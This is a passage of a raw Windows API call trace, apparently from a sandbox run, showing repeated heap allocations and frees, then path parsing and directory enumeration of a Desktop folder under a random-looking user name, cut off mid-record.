(HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.243] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\") returned="ZsR7Xc26_DfdmVcahH\\" [0188.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0188.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.243] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0188.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0188.244] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0188.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.244] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.245] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.245] PathFindFileNameW (pszPath="") returned="" [0188.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.245] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf1a7000, ftCreationTime.dwHighDateTime=0x1d89d3c, ftLastAccessTime.dwLowDateTime=0xd6357f90, ftLastAccessTime.dwHighDateTime=0x1d8a4f6, ftLastWriteTime.dwLowDateTime=0xd6357f90, ftLastWriteTime.dwHighDateTime=0x1d8a4f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0188.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.248] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf1a7000, ftCreationTime.dwHighDateTime=0x1d89d3c, ftLastAccessTime.dwLowDateTime=0xd6357f90, ftLastAccessTime.dwHighDateTime=0x1d8a4f6, ftLastWriteTime.dwLowDateTime=0xd6357f90, ftLastWriteTime.dwHighDateTime=0x1d8a4f6, 